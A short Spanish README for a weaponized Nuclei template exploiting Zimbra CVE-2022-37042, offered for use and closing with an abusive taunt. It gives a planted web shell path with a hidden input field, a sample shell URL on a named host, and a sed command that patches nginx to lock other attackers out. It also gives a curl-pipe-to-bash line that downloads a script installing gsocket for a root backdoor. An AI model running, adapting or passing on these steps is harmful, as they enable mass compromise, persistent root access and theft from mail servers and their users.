
Plantilla armada de Nuclei para Zimbra CVE-2022-37042
ruta del shell: /public/formatter.jsp
Nuclei en sí: https://github.com/projectdiscovery/nuclei
el shell tiene una entrada oculta con opacidad 0, así que simplemente pasa el ratón sobre ella, escribe el comando y pulsa la tecla [Enter]:
ejemplo de URL del shell:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
ejecuta este comando (pero solo una vez):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
se necesita código adicional para servidores que no usan Nginx sino Apache. Las pull requests son bienvenidas.
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
este comando instalará global-socket (https://www.gsocket.io/deploy/) y te pasará la clave para conectarte como root.
feliz masacre de cumpleaños, hijos de puta ;)